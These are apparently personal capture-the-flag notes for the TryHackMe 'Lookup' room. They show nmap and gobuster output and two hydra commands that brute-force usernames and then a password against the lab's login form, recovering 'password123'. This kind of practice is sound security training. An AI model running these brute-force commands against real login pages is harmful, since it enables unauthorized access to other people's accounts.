Lookup (https://tryhackme.com/room/lookup)
IP: 10.10.5.13

- ENUMERATION
- nmap
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.9 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 77:e7:16:64:ae:9d:17:83:71:07:a2:9a:95:d8:34:54 (RSA)
|   256 d0:5f:d0:c2:07:8b:b5:ec:4e:89:24:d1:4f:b9:6d:9a (ECDSA)
|_  256 20:2b:e5:16:82:96:71:1b:06:d7:b5:7d:a2:0d:78:43 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Did not follow redirect to http://lookup.thm
|_http-server-header: Apache/2.4.41 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

- gobuster
/index.php


- HYDRA
- Usernames (hydra -p password -L /usr/share/seclists/Usernames/Names/names.txt lookup.thm http-post-form "/login.php:username=^USER^&password=^PASS^:username")
usernames:
- admin
- jose

- Password (hydra -l jose -P /usr/share/wordlists/rockyou.txt lookup.thm http-post-form "/login.php:username=^USER^&password=^PASS^:Wrong")
password123








